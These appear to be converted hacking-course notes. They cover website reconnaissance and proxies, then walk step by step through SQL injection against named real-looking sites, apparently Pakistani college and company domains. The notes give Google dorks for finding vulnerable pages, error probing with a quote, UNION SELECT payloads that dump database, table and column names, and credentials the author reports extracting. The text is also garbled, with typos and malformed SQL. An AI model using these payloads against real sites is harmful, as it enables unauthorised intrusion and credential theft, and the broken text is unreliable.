You are on page 1of 3

www.allwhois.

com
2.Nslookup - IP from cmd
cmd>nslookup facebook.com

3.Reverse IP mapping - doamins hosted on the same server


reverse Email lookup toop (you get signal)
search email

4.Info gathering of website using plugin


wapplyser
Apache/ Unix/ Gnix/ Litespeed - LINUx
Microsoft/ IIS/ Asp.net - WIN OS
glassfish - Java OS

5.Proxy Servers - Opern Servers


www.kproxy.com
www.boomproxy.com
www.hidemy*.com - Maintain logs
VPN - Virtual Private Network
http://- 443 - No logs
http://vpngate.net/ - download vpn client
whatismyip.com

6.Info gathering using search engine


www.kartoo.com
www.maltego.org
www.shodan.io

PORTS - tunnels (65500+)


Physical -USB, Serial Port
Virtual - 1- 65535
https:// - 443
http:// - 80
ftp - 21
smtp - 25
POP - 110

to hack a website (sunny_3459@yahoo.in)

1.Basic SQL Injection / Authentication BYpass


SQL -
sunny sunny
select * from member where userid ='sunny'
and password='sunny'
step 1: find out login page of website
site:iisc.ac.in
pk inurl:/login
pk inurl:/admin
pk inurl:/cpane
pk inuel:/cp

iisc.ac.in intext:username
intext

guessing useselest 1 * from member where userid ='admin, and a

2.Advanced SQL Injection


select - select info from database
insert - insert values into database
update - update values into databse
delete - delete values
create - create table
drop - drop table
order by - sorting columns
schema - structure of data base
' - starting of SQL values/commands

http://site.com/news.php?id=1-
http://site.com/news/10
news title:
news content:
news author:
? - asking data from database

step 1: find out link which contains ?id=10


pk inurl:php?id=
pk inural:asp?id=
pk inural:a

com.pk
gov.pk

step 2: add ' after ?id=10


http://citicollege.edu.edu.pk/main.php?Id=1'
http://tncgroup.pk/content.php?Id=2'

blank page = error page = SQL Injection Vulnerable

step 3:find out number of vulnerable links:


http://citicollege.edu.pk/main.php?Id=1'
id=1 to id=1000 --
-- : end of query
number of vulnerable links are 8

step 4:find out link from which we can select data:


http://citicollege.edu.pk/main.php?
Id=-1 union all select 1,2,3,4,5,6,7,8 --
we can select data from 2 & 6

step 5:finding out databse, tables & columns


Id=-1 union all select 1,database(),3,4,5,6,7,8 --
DB: citioffi_college
schema - structure of tables & columns
information_schema - stores info
table_name
information_schema.tables - table structure
column_name
information_schema.columns - column structure
Id=-1 union all select
1, table_name ,3,4,5,6,7,8 from
information_schema.tables --

for complicated websites


Id=-1 union all select
1, table_group_concat(table_name) ,3,4,5,6,7,8 from
information_schema.tables --

table_schema=database() --
lito_user

for complicated websites


Id=-1 union all select
1, table_group_concat(column_name) ,3,4,5,6,7,8 from
information_schema.columns
where table_schema='lito_user' --

table: lito_user
columns: Id,Username,Password,FullName,Email

step 6:find out row values


Id=-1 union all select 1,UserName

Id=-1 union all select 1,Password,3,4,5,6,7,8 from lito_user --


admin:admin

softwares:
Havij
SQL Injector
SQLMap